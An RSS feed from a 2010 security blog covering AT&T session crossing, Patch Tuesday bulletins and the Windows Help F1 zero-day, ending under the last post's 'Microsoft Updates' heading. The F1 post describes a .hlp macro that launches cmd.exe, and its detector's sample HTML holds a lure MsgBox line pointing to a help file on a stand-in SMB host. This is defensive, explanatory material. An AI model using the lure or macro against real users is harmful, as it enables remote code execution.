<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Praetorian Prefect &#187; Security</title>
	<atom:link href="http://praetorianprefect.com/archives/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://praetorianprefect.com</link>
	<description>Information security, a little slower...a little deeper</description>
	<lastBuildDate>Thu, 29 Jul 2010 16:38:31 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>iPhone 4 Ordering and Session Switching</title>
		<link>http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/#comments</comments>
		<pubDate>Tue, 15 Jun 2010 21:18:19 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[AT&T]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4215</guid>
		<description><![CDATA[Upon logging into AT&#38;T online to place an order for the new iPhone, some users are reporting that another user's information is coming up including billing information, call history, and so forth.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/iPhone-4.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/iPhone-4-150x150.jpg" alt="" title="iPhone-4" width="150" height="150" class="alignleft size-thumbnail wp-image-4221" /></a></p>

<p>Users are reporting problems trying to reserve the ability to purchase (pre-order) the iPhone 4 ahead of its June 24th release, caused by what is basically the ordering systems being completely overwhelmed. AT&amp;T&#8217;s web interface at brick-and-mortar shops is failing to the point where orders are being taken with pen and paper, and the Apple web site is sluggish. But the most serious issue people are reporting is that upon logging into AT&amp;T&#8217;s online account site to place the order, another user&#8217;s information comes up.</p>

<p>AT&amp;T eventually just disabled online access for its users. <a href="http://gizmodo.com/5564262/apple-iphone-4-order-security-breach-exposes-private-information">Gizmodo</a> received these messages, among roughly eight complaints from its readership:</p>

<pre><code>From: Eric Paul Mertens
Date: Tue, Jun 15, 2010 at 11:19 AM
Subject: AT&amp;T iphone pre-order wrong account

This morning while trying to pre-order the iPhone 4 through AT&amp;T website, my login brought me to a 'website 
unavailable' screen. After a refresh it brought me to the phone upgrade page logged in under a different 
account, 

some dude from Lakewood OH!
</code></pre>

<pre><code>From: Michael
Date: Tue, Jun 15, 2010 at 11:09 AM
Subject: AT&amp;T security breach

Hello,

I am not sure if this e-mail is going to the correct place but this morning when trying to log in to my at&amp;t 
account I entered my information and ended up in someone else's account with access to all their information. 
I feel as though someone could now be logged in to my account. To me, this seems like a huge security 
breach and at&amp;t is shrugging me off as if it is no big deal and I feel that it is. I just thought with the
recent i-pad breach that this one is an even bigger one and I wanted to bring it to your attention.

Thanks,
Michael Staropoli
</code></pre>

<p>And one user was kind enough to provide a screenshot to drive home the point.</p>

<pre><code>From: john king
Date: Tue, Jun 15, 2010 at 2:04 PM
Subject: ATT WEBSITE LOGS ME IN AS ANOTHER CUSTOMER
To: tips@gizmodo.com

I LOGGED IN AS ME AND IT BROUGHT UP A MARY ???? BIG PROBLEM
-JPK
</code></pre>

<div id="attachment_4232" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/att_mary.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/att_mary.jpg" alt="" title="att_mary" width="700" height="469" class="size-full wp-image-4232" /></a><p class="wp-caption-text">AT&amp;T user finds that he's a Mary.</p></div>

<h3>System Upgrade?</h3>

<p>Gizmodo also received a report from a third party asserting that an untested (in their opinion) system change is probably responsible for these issues.</p>

<p><i>I work at a 3rd party order processing facility—what AT&amp;T refers to as a 3CC. We process business-to-business, business-to-customer Wireline Indirect, and ACME/PAC (what AT&amp;T calls their iPhone program internally). Agents use AT&amp;T programs called Phoenix, Telegence, Compass, Ordertrack and myCSP to process orders.</p>

<p>Over the weekend there was a major fraud update that went down on all of AT&amp;T&#8217;s systems, from Saturday overnight to Sunday early morning. All systems were down and agents were unable to use any systems.</p>

<p>The issues people are seeing at AT&amp;T stores and online are most likely related to this update that went wrong.</p>

<p>I do know that there was absolutely NO TESTING of this system done before the launch of the new iPhone. I know it&#8217;s just hearsay at this point, but I can confirm that there was a major outage over the weekend that impacted all ordering systems and programs, and I can confirm that there were multiple systems being upgraded/updated, with some updates being related to fraud.</p>

<p>At this point, I can say that the system that AT&amp;T uses to send automated orders to be processed is as of this very moment down completely. Our facility is unable to process any orders by phone or by automation.</p>

<p>(Regarding the identity problem) Whenever we see people who are logging in and seeing other customers&#8217; account info, it is an issue with the databases that contain customer information. Orders that contain any information like this can cross customer information, and cause a customer to be able to see other accounts by logging out and logging back in. This means that when they log in a few times, it gives them different customer account info every time. It&#8217;s a rare occurrence, but it has happened in the past.</p>

<p>You might want to advise people to not get the upgrade at this point as it may be a doorway to a major privacy breach.</i></p>

<p>This analysis is thin and speculative at best. It focuses on the agent-facing and B2B ordering platforms, whereas the problems are being reported on the retail web site. It is possible for a problem to be introduced this way, but one would expect the effects to be far more widespread than a single login flow.</p>

<h3>Nah&#8230;</h3>

<p>So, without any other information, how do we conclude that one user logging in and seeing another user&#8217;s information is probably not the result of a weekend systems upgrade? Because we&#8217;ve seen this behavior before, a lot. When you stress test a web site, it&#8217;s not uncommon to see the functions that create and read user sessions get garbled, so that the site starts returning pages for the wrong user&#8217;s session.</p>

<div id="attachment_4236" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/500x_att-store-line.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/500x_att-store-line-150x150.jpg" alt="" title="500x_att-store-line" width="150" height="150" class="size-thumbnail wp-image-4236" /></a><p class="wp-caption-text">U.S. productivity grinds to a standstill.</p></div>

<p>When you log into a web site, a session gets created and some sort of persistence mechanism is handed back to maintain it (usually a session cookie, although other, less common methods exist). Every &#8220;logged in&#8221; page reads this session identifier to determine whether the user is logged in and which user&#8217;s data to return. Large web sites add further complexity: with load balancing in place, a user&#8217;s session has to be located across data centers, servers, and so forth.</p>

<p>As Christian points out below, one example is that session identifiers are sometimes derived from a timestamp, which on many sites has only millisecond resolution. When such a site receives enough concurrent requests, it starts issuing duplicate session identifiers, and two users end up sharing one session record.</p>

<p>When you overload the programs that create, read, and manage sessions, bad things happen, such as sessions getting crossed. Since the AT&amp;T site was under a severe and unusually high load today, the site went haywire (in our technical opinion).</p>
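<p>The following is an added example, not code from the original post or from AT&amp;T: it replays a constructed burst of logins against a session store using a clock-derived session identifier of the kind described above, and shows that two logins in the same millisecond receive the same cookie, so the earlier user&#8217;s next request renders the later user&#8217;s account. The same burst with identifiers from Python&#8217;s <code>secrets</code> module (the standard library CSPRNG) produces no collisions. The user names, timestamps and session store are all constructed for the demonstration.</p>

```python
"""Added example (not from the post): why clock-derived session identifiers
cross sessions under load, contrasted with CSPRNG-generated identifiers.
All users, timestamps and the session store are constructed for the demo."""
import secrets
from typing import Callable, Dict, List, Tuple

# Constructed burst: four logins during the pre-order rush, three of which
# the server processes within the same millisecond (epoch milliseconds).
BURST_LOGINS: List[Tuple[str, int]] = [
    ("alice", 1276617600000),
    ("bob", 1276617600000),
    ("mary", 1276617600000),
    ("john", 1276617600001),
]


def timestamp_session_id(login_ms: int) -> str:
    """Weak scheme from the post: the identifier is just the wall clock, so any
    two logins handled in the same millisecond receive the same cookie."""
    return f"sess-{login_ms}"


def random_session_id(_login_ms: int) -> str:
    """Sound scheme: 128 bits from the OS CSPRNG; collisions are not a
    practical concern and the value reveals nothing about when it was issued."""
    return secrets.token_urlsafe(16)


def run_logins(logins: List[Tuple[str, int]], make_id: Callable[[int], str]):
    """Replay the logins against a session store keyed by session id.

    Returns (store, cookies, collisions):
      store      session id -> account the server associates with it
      cookies    user -> the session id handed back to that user at login
      collisions (session id, previous owner, new owner) for every overwrite
    """
    store: Dict[str, str] = {}
    cookies: Dict[str, str] = {}
    collisions: List[Tuple[str, str, str]] = []
    for user, login_ms in logins:
        sid = make_id(login_ms)
        if sid in store:
            # The key already exists: the later login silently replaces the
            # earlier user's record, and both users now hold the same cookie.
            collisions.append((sid, store[sid], user))
        store[sid] = user
        cookies[user] = sid
    return store, cookies, collisions


def whoami(store: Dict[str, str], cookies: Dict[str, str], user: str) -> str:
    """The account the server renders for `user` on their next request."""
    return store[cookies[user]]


def demo():
    """Returns ({user: account shown}, weak-scheme collisions, strong-scheme collisions)."""
    store, cookies, collisions = run_logins(BURST_LOGINS, timestamp_session_id)
    shown = {user: whoami(store, cookies, user) for user, _ in BURST_LOGINS}
    # Same-millisecond stampede, 10,000 logins, random identifiers.
    _, _, safe = run_logins(
        [(f"user{i}", 1276617600000) for i in range(10_000)], random_session_id
    )
    return shown, len(collisions), len(safe)


if __name__ == "__main__":
    shown, weak, strong = demo()
    for user, account in shown.items():
        print(f"{user:>6} logs in and sees {account}'s account")
    print(f"timestamp ids: {weak} collisions; random ids: {strong} collisions")
```

<p>Running it shows alice and bob both landing in mary&#8217;s account, which is exactly the &#8220;I logged in as me and it brought up a Mary&#8221; report above. The fix is not a bigger server; it is to never derive a session identifier from anything shared or predictable, and to have the session store refuse to overwrite an existing key rather than silently replacing it.</p>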

<p>How do you prevent this? Add periodic and event-driven stress testing to your quality assurance process; it will surface a number of unusual and difficult-to-solve problems. Generate session identifiers from a cryptographically secure random source rather than from a clock or a counter, so that two concurrent logins cannot collide. At the very least you will know how your web application behaves under unusually high load, and so will not be surprised when the Apple fanboys come calling for Steve&#8217;s latest masterpiece.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/">Regular or Decaf? Tool launched to combat COFEE</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>May&#8217;s Patch Tuesday</title>
		<link>http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/</link>
		<comments>http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/#comments</comments>
		<pubDate>Tue, 11 May 2010 22:46:23 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3915</guid>
		<description><![CDATA[
After a busy April, May&#8217;s Patch Tuesday is much quieter, with two updates released by Microsoft. Both are rated critical, but read the details below to see how your environment may or may not be affected.

Microsoft Updates



ID: MS10-030
Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code Execution 
Microsoft Severity: Critical

Summary: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/msft_logo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/msft_logo.jpg" alt="msft_logo" title="msft_logo" width="50" height="50" class="alignleft size-full wp-image-3484" /></a>
After a busy April, May&#8217;s Patch Tuesday is much quieter, with two updates released by Microsoft. Both are rated critical, but read the details below to see how your environment may or may not be affected.</p>

<h3>Microsoft Updates</h3>

<hr />

<p><strong>ID:</strong> <a href="http://www.microsoft.com/technet/security/Bulletin/MS10-030.mspx">MS10-030</a><br />
<strong>Title:</strong> Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code Execution <br />
<strong>Microsoft Severity:</strong> Critical<br /></p>

<p><strong>Summary:</strong> A vulnerability exists in Outlook Express and Windows Mail caused by insufficient validation of network data before using it to calculate the size of a buffer. An attacker can exploit the vulnerability by tricking a user into connecting to a malicious POP3 or IMAP server.<br /></p>

<p><strong>Praetorian&#8217;s Recommendation:</strong> The critical severity is due to the potential for remote code execution; however, there are a few key points that mitigate it. First, the affected mail clients are Outlook Express and Windows Mail; Office Outlook is not affected. Second, the client must initiate a connection to a malicious server. In a corporate or enterprise environment, the egress points should restrict outbound POP3 and IMAP, or the desktop configuration should prevent users from modifying mail server settings.<br /></p>

<hr />

<p><strong>ID:</strong> <a href="http://www.microsoft.com/technet/security/Bulletin/MS10-031.mspx">MS10-031</a><br />
<strong>Title:</strong> Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution <br />
<strong>Microsoft Severity:</strong> Critical<br /></p>

<p><strong>Summary:</strong> A vulnerability exists in Visual Basic for Applications (VBA) which can lead to remote code execution. An attacker can create a malicious Office file (Word, Excel) which exploits the VBA vulnerability when opened.<br /></p>

<p><strong>Praetorian&#8217;s Recommendation:</strong> A user would need to open a malicious file to be exploited; therefore, continued emphasis on user training in handling email attachments and web content is necessary. Prepare this update for your next Microsoft Office patch cycle.<br /></p>

<hr />

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/">Regular or Decaf? Tool launched to combat COFEE</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>March&#8217;s Patch Tuesday</title>
		<link>http://praetorianprefect.com/archives/2010/03/3473/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/3473/#comments</comments>
		<pubDate>Tue, 09 Mar 2010 20:38:40 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Patch Management]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[excel]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[office]]></category>
		<category><![CDATA[office for mac]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patch tuesday]]></category>
		<category><![CDATA[updates]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3473</guid>
		<description><![CDATA[<a href="http://praetorianprefect.com/wp-content/uploads/2010/03/msft_logo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/msft_logo.jpg" alt="msft_logo" title="msft_logo" width="150" height="150" class="alignleft size-full wp-image-3484" /></a>

Today is patch Tuesday for March 2010, and Microsoft has released two security bulletins for this round of updates, neither of which are deemed critical. The second bulletin addresses seven different vulnerabilities across various versions of Microsoft Office Excel.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/msft_logo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/msft_logo.jpg" alt="msft_logo" title="msft_logo" width="150" height="150" class="alignleft size-full wp-image-3484" /></a></p>

<p>Today is patch Tuesday for March 2010, and Microsoft has released two security bulletins for this round of updates, neither of which are deemed critical. The second bulletin addresses seven different vulnerabilities across various versions of Microsoft Office Excel.</p>

<hr />

<p><strong>ID:</strong> <a href="http://www.microsoft.com/technet/security/bulletin/ms10-016.mspx">MS10-016</a><br />
<strong>Title:</strong> Vulnerabilities in Windows Movie Maker Could Allow Remote Code Execution<br />
<strong>Microsoft Severity:</strong> Important<br /></p>

<p><strong>Summary:</strong> There is a buffer overflow in Windows Movie Maker and Microsoft Producer 2003 which can lead to code execution. Movie Maker 2.1 is included with Windows XP SP2 and SP3, and Movie Maker 6.0 is included with Vista. Movie Maker 2.6 is an optional download for Vista and Windows 7.<br /></p>

<p><strong>Praetorian&#8217;s Recommendation:</strong> This is rated Important rather than Critical because the user has to open content that exploits the vulnerability: a user would have to be tricked into opening a malicious Movie Maker project file (.mswmm). This can be applied in your next patch cycle and is not considered urgent.<br /></p>

<hr />

<p><strong>ID:</strong> <a href="http://www.microsoft.com/technet/security/Bulletin/MS10-017.mspx">MS10-017</a><br />
<strong>Title:</strong> Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution<br />
<strong>Microsoft Severity:</strong> Important<br /></p>

<p><strong>Summary:</strong> This update addresses seven different vulnerabilities in Microsoft Office Excel. Each vulnerability may affect one or more of the following versions: Office Excel 2002 SP3, Office Excel 2003 SP3, Office Excel 2007 SP1 and SP2, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac, Office Excel Viewer SP1 and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, and Office SharePoint Server 2007 SP1 and SP2.<br /></p>

<p><strong>Praetorian&#8217;s Recommendation:</strong> Although, as with MS10-016, the user must open a malicious file, Excel formats are far more recognizable, and phishing and social engineering are more successful with a known or common file format. This can be applied in your next patch cycle, but it warrants more attention than MS10-016.<br /></p>

<hr />

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/02/februarys-patch-tuesday/">February&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/disable-acrobat-reader-pdf-in-the-enterprise/">Using Group Policy to Disable JavaScript in Adobe PDF Files</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/3473/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Press F1 for Help, pwned.</title>
		<link>http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/#comments</comments>
		<pubDate>Tue, 02 Mar 2010 17:39:54 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Remote Exploit]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Security Policy]]></category>
		<category><![CDATA[Stay Safe Online]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[help system]]></category>
		<category><![CDATA[ie]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[winhlp32]]></category>
		<category><![CDATA[zero-day]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3444</guid>
		<description><![CDATA[

Microsoft published security advisory 981169 yesterday in response to the zero day vulnerability reported a few days prior. The vulnerability is in the help system and can be triggered by luring an Internet Explorer user into pressing the F1 key. Windows 2000, Windows XP SP2 &#38; SP3, and Windows 2003 SP2 with Internet Explorer 7 [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/Vista_Help_thumb_7AEAB696.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/Vista_Help_thumb_7AEAB696-150x150.png" alt="Vista_Help_thumb_7AEAB696" title="Vista_Help_thumb_7AEAB696" width="125" height="125" class="alignleft size-thumbnail wp-image-3449" /></a></p>

<p>Microsoft published security advisory <a href="http://www.microsoft.com/technet/security/advisory/981169.mspx">981169</a> yesterday in response to the zero day vulnerability reported a few days prior. The vulnerability is in the help system and can be triggered by luring an Internet Explorer user into pressing the F1 key. Windows 2000, Windows XP SP2 &amp; SP3, and Windows 2003 SP2 with Internet Explorer 7 and Internet Explorer 8 are all affected.</p>

<p>Credit to Maurycy Prodeus for publishing the <a href="http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt">initial details</a> of the vulnerability.</p>

<h3>Details</h3>

<p>Using the MsgBox VBScript function in an HTML file, an attacker can create a dialog box prompting the user to press F1, something that is likely not difficult to do with a message such as &#8220;Internet Explorer encountered an error, press F1 to continue&#8221;. The <a href="http://msdn.microsoft.com/en-us/library/sfw6660x(VS.85).aspx">MsgBox</a> function matters because its fourth argument is the helpfile parameter: which .hlp or .chm file to launch when the user asks for help via F1.</p>

<p>I created a simple help file containing the word &#8220;Test&#8221; using Microsoft Help Workshop version 4.03. In addition, I added a macro to launch a command prompt (cmd.exe). When I double-click this file in Windows XP SP3, I get my test help file and the command prompt launches as well:</p>

<div id="attachment_3447" class="wp-caption alignright" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/ScreenHunter_02-Mar.-02-11.51.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/ScreenHunter_02-Mar.-02-11.51-300x248.jpg" alt="Cmd.exe launched with my Help file." title="ScreenHunter_02 Mar. 02 11.51" width="300" height="248" class="size-medium wp-image-3447" /></a><p class="wp-caption-text">Cmd.exe launched with my Help file.</p></div>

<p>So we now have a .hlp file which executes code. As mentioned before, the MsgBox function has a parameter to specify a help file to launch when the user presses F1. Here is where I come back to a recurring issue: SMB traffic and allowing it outbound through firewalls. For the MsgBox parameter to launch the .hlp file, the attacker must either point to a local file (which the user would already have had to download) or host the file on an Internet-accessible SMB share. If you look at the proof-of-concept code circulating, you will see the MsgBox help parameter is &#8220;\\x.x.x.x\attackfile.hlp&#8221;, a UNC path to a help file on an SMB share. Corporate enterprises should certainly block SMB outbound, and given this vulnerability and the several previous attacks via the SMB client, home users should be blocking this outbound traffic as well.</p>
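<p>As an added example, not code from the original post or from the advisory, here is a small content check of the kind a web proxy or mail gateway could run on HTML before it reaches Internet Explorer: it finds VBScript MsgBox calls, splits the argument list properly (commas inside quoted strings do not count), and reports any call that supplies the fourth, helpfile, argument, distinguishing a UNC path to an SMB share from a local .hlp/.chm reference. This complements, rather than replaces, blocking outbound SMB. The sample page, the 203.0.113.5 address (a documentation-only range) and the file names are constructed for the demonstration.</p>

```python
"""Added example (not from the post or the advisory): a content check that flags
VBScript MsgBox calls carrying a helpfile argument, which is the lure described
above. The sample HTML, host address and file names are constructed."""
import re
from typing import List, Optional, Tuple

# Constructed sample page: one benign MsgBox, one with a help file on an SMB
# share (203.0.113.5 is a documentation address, not a real host), and one
# pointing at a local .hlp file.
SAMPLE_HTML = r'''<html><body>
<script type="text/vbscript">
  MsgBox "Your settings were saved.", 64, "Status"
  MsgBox "Internet Explorer encountered an error, press F1 to continue", 16, "Error", "\\203.0.113.5\pub\attackfile.hlp", 1
  result = MsgBox("Press F1 for help", 48, "Notice", "C:\Temp\local.hlp", 1)
</script>
</body></html>'''

UNC_PATH = re.compile(r"^\\\\[^\\]+\\.+", re.I)
MSGBOX = re.compile(r"\bMsgBox\b\s*(.*)$", re.I)


def split_vb_args(arg_text: str) -> List[str]:
    """Split a VBScript argument list on top-level commas, honouring double-
    quoted strings (with "" as the escaped quote)."""
    args: List[str] = []
    cur: List[str] = []
    in_str = False
    i = 0
    while i < len(arg_text):
        ch = arg_text[i]
        if ch == '"':
            if in_str and arg_text[i + 1:i + 2] == '"':
                cur.append('""')
                i += 2
                continue
            in_str = not in_str
            cur.append(ch)
        elif ch == "," and not in_str:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    if cur or args:
        args.append("".join(cur).strip())
    return args


def helpfile_argument(statement: str) -> Optional[str]:
    """Return MsgBox's fourth (helpfile) argument from one statement, or None."""
    m = MSGBOX.search(statement)
    if not m:
        return None
    body = m.group(1).strip()
    if body.startswith("(") and body.endswith(")"):
        body = body[1:-1]
    args = split_vb_args(body)
    if len(args) < 4 or not args[3]:
        return None
    helpfile = args[3]
    if helpfile.startswith('"') and helpfile.endswith('"'):
        return helpfile[1:-1].replace('""', '"')
    return helpfile  # an expression or variable; still worth a look


def classify(helpfile: str) -> str:
    """'unc' for an SMB share path, 'helpfile' for any other .hlp/.chm reference,
    otherwise 'expression' (e.g. a variable name)."""
    if UNC_PATH.match(helpfile):
        return "unc"
    if helpfile.lower().endswith((".hlp", ".chm")):
        return "helpfile"
    return "expression"


def scan(html: str) -> List[Tuple[int, str, str]]:
    """Scan a page line by line; return (line number, helpfile, classification)
    for every MsgBox call that names a help file."""
    findings = []
    for lineno, line in enumerate(html.splitlines(), 1):
        helpfile = helpfile_argument(line)
        if helpfile is not None:
            findings.append((lineno, helpfile, classify(helpfile)))
    return findings


if __name__ == "__main__":
    for lineno, helpfile, kind in scan(SAMPLE_HTML):
        print(f"line {lineno}: MsgBox helpfile={helpfile!r} [{kind}]")
```

<p>A legitimate intranet page has little reason to hand MsgBox a help file at all, so any hit is worth blocking or at least alerting on; a UNC path is the strongest signal because it is precisely the &#8220;\\x.x.x.x\attackfile.hlp&#8221; pattern from the circulating proof of concept. The check is line-oriented and does not follow VBScript line continuations or string concatenation, so treat it as a first filter, not a parser.</p>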

<h3>Vista, Windows 7, &amp; Server 2008</h3>

<p>The exploit does not work on Vista, Windows 7 and Windows Server 2008 because Microsoft no longer ships winhlp32.exe with these versions. However, there is an update which installs winhlp32 on these versions (<a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=258aa5ec-e3d9-4228-8844-008e02b32a2c&amp;displaylang=en">Windows 7 version I installed from here</a>). I found that with these updates cmd.exe did not launch as it did on the Windows XP version (I also tried Prodeus&#8217;s PoC help file; it displayed but did not run calc.exe). It is possible that Microsoft removed this code execution function from these versions.</p>

<h3>Workarounds</h3>

<p>The guidance is to avoid pressing F1 when prompted to by a web site. Additionally, permissions on winhlp32.exe can be modified so that it doesn&#8217;t execute. In an Active Directory environment, a Group Policy software restriction policy can prohibit winhlp32.exe from launching. As mentioned, I recommend blocking outbound SMB traffic, as there is rarely a justification for mounting a network share across the public Internet; this mitigates many previously disclosed vulnerabilities as well.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/">Turning an ATM into a Slot Machine</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/thou-shalt-not-send-naked-pictures-to-anyone-ever/">Thou Shalt Not Send Naked Pictures&#8230;To Anyone Ever</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/iepeers-a-new-internet-explorer-zero-day-vulnerability/">IEPeers &#8211; A New Internet Explorer Zero Day Vulnerability</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>First Patch Tuesday of 2010</title>
		<link>http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/</link>
		<comments>http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/#comments</comments>
		<pubDate>Tue, 12 Jan 2010 23:08:10 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=2947</guid>
		<description><![CDATA[We begin a new year and arrive at the first patch Tuesday of the decade. The news and spread of malware related to Adobe Reader continues to gain momentum and the information security community believes that this year will produce more exploits using Reader. I will include both the Microsoft and Adobe updates in these [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/image_31_3_thumb1.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/image_31_3_thumb1.png" alt="image_31_3_thumb.png" title="image_31_3_thumb.png" width="93" height="109" class="alignleft size-full wp-image-2093" /></a>We begin a new year and arrive at the first patch Tuesday of the decade. The news and spread of malware related to Adobe Reader continues to gain momentum and the information security community believes that this year will produce more exploits using Reader. I will include both the Microsoft and Adobe updates in these patch Tuesday posts, along with the severity level I feel they deserve based on the details.</p>

<h3>Severity Levels</h3>

<p>Microsoft has a rating system for bulletins with four levels: Critical, Important, Moderate, and Low; Adobe follows the same scale. The severity levels I provide differ from Microsoft&#8217;s in that I weigh the real-world exploitation scenario. For example, Microsoft will assign an Important rating when exploitation could compromise availability, as in a denial of service. MS09-069 can result in a denial of service; however, the attacker must already be authenticated, so I drop the severity to Low.</p>

<h3>Microsoft Updates</h3>

